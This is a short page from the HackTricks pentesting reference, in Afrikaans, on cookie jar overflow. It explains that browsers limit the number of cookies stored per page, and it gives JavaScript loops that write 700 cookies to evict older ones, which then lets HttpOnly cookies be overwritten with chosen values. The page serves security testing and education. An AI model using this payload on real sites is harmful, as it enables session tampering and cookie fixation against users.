hacktricks/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md

3.1 KiB

{% hint style="success" %} Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks
{% endhint %}

Die blaaiers het 'n grens op die aantal koekies wat hulle vir 'n bladsy kan stoor. Dan, as jy om een of ander rede 'n koekie wil laat verdwyn, kan jy die koekiepot oorloop aangesien die oudste eene verwyder sal word voordat:

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Let wel, dat derdeparty-kookies wat na 'n ander domein verwys nie oorgeskryf sal word nie.

{% hint style="danger" %} Hierdie aanval kan ook gebruik word om HttpOnly-kookies te oorgeskryf, aangesien jy dit kan verwyder en dan weer kan instel met die waarde wat jy wil.

Kontroleer dit in hierdie pos met 'n laboratorium. {% endhint %}

{% hint style="success" %} Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks
{% endhint %}